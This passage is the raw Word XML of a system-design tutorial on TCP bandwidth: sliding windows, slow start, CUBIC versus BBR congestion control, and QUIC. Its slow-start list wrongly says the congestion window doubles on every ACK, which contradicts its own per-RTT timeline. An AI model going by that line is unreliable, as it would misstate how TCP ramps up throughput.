          <w:numId w:val="1105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Keep data local to its region when possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2952D343" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Compress aggressively before cross-region transfer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697F7FCA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Use CDC (Change Data Capture) to replicate only changes (not full copies).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B56490A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Cache aggressively at each region to avoid cross-region reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183CEA9D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Batch cross-region transfers to reduce per-byte overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740144AD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="50C3E31F">
          <v:rect id="_x0000_i4373" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB4912A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Bandwidth and TCP — How the Protocol Manages Capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D31DCE2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 TCP Window and Bandwidth Utilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF3C834" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental TCP bandwidth problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5467B5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>TCP is ACK-driven. The sender sends data and waits for acknowledgment before sending more. Without optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541B451F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3537A335" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Sender sends 1 packet → waits RTT for ACK → sends next packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327D0624" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Effective throughput = packet_size / RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01615D69" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>For a 1500-byte packet with 100ms RTT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F493FD1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0821F106" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Throughput = 1500 × 8 / 0.1 = 120,000 bps = 120 Kbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192825B9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>On a 1 Gbps link, you're using 0.012% of available bandwidth. Catastrophic underutilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343BDE52" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution — Sliding Window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CCC325" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Send MULTIPLE packets before waiting for ACKs. The "window" defines how many bytes can be in flight simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0567525A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CEF1C7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Throughput = Window_Size / RTT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091E4A25" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>To saturate a 1 Gbps link with 100ms RTT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0F21AA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618B67BF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Window = 1 Gbps × 100ms = 100 Mbit = 12.5 MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C18074B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Need a 12.5 MB window to fully utilize the link. TCP's maximum window (with window scaling) is 1 GB — more than enough.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC9A39" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 TCP Congestion Control — How TCP Discovers Available Bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A15253F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> How does TCP know how much bandwidth is available without being told?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08429FA2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> It probes by gradually increasing its sending rate until it detects congestion (packet loss or increased latency), then backs off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF2BC3D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP Slow Start:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C6310" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Connection starts with a small congestion window (cwnd = 10 segments typically, ~14KB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE13873" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>For every ACK received, cwnd doubles (exponential growth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F733D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Growth continues until:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A34AE5E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>A packet is lost (network is congested) → cwnd drops drastically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521249BB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>cwnd reaches ssthresh (slow-start threshold) → switches to linear growth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A35A6F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Timeline of bandwidth utilization (new connection):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD12372" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4549C56C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 0: cwnd = 10 segments = 14 KB sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A27A790" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 1: cwnd = 20 segments = 28 KB sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E54054C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 2: cwnd = 40 segments = 56 KB sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185C011D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 3: cwnd = 80 segments = 112 KB sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA37A79" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E2BA1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 7: cwnd = 1280 segments = ~1.8 MB sent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFC97C1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 10: cwnd = 10240 segments = ~14 MB sent → approaching link capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41569FE7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With 100ms RTT, it takes ~10 RTTs (1 second) to ramp up to 1 Gbps throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33414420" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this matters for system design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DF45FB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Short-lived connections waste bandwidth.</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> A connection that transfers 100 KB and closes never leaves slow start. It uses a fraction of available bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358C9D87" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/1.1 (new connection per request):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Each request starts from slow start → terrible bandwidth utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E841ABC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 (single long-lived connection, multiplexed):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Connection stays warm, cwnd is large, bandwidth is fully utilized for all requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D027E34" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection pooling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Keeping warm connections avoids slow start penalty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B07DE9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Congestion Control Algorithms — How They Differ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DB387F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CUBIC (default on Linux):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49134CB5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>After packet loss, reduces cwnd by ~30% (not 50% like older algorithms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04729D2A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Grows cwnd as a cubic function of time since last congestion event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C040CD4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Aggressive at filling bandwidth but may cause persistent queue building.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026D002E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Good for: high-bandwidth, moderate-latency links.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAC8C0D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BBR (Bottleneck Bandwidth and Round-trip propagation time — Google):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38859010" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Does NOT use packet loss as the congestion signal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F48F46" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Instead, continuously estimates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F296BFD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Maximum bandwidth (bottleneck rate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1320909F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Minimum RTT (propagation delay).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6358D0B8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Sets sending rate = estimated bandwidth × buffer factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614BFC15" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Avoids filling buffers (reduces bufferbloat).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B129848" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Much better performance on high-BDP links (long-distance, high-capacity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5368D626" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why BBR matters for system design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EC6165" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Traditional congestion control fills network buffers, adding latency (bufferbloat). BBR keeps buffers nearly empty while still utilizing full bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4261479E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29054FD7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>CUBIC: Throughput = high, Latency = high (fills buffers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4C3F8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>BBR:   Throughput = high, Latency = low (avoids buffer filling)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6EEB45" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>For latency-sensitive applications (real-time APIs, gaming, VoIP), BBR provides much better performance without sacrificing throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0644784F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QUIC (HTTP/3) advantages for bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC811B2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>No head-of-line blocking (one lost packet doesn't stall all streams).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155B8679" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Faster connection startup (0-RTT = immediate bandwidth utilization on reconnection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73429B42" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Per-stream congestion control possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4B21DE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Migrates across network changes without restarting from slow start (connection ID-based, not IP-based).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265F3B42" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 TCP Bandwidth Optimization Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E712540" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Window scaling (RFC 7323):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AECCA9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
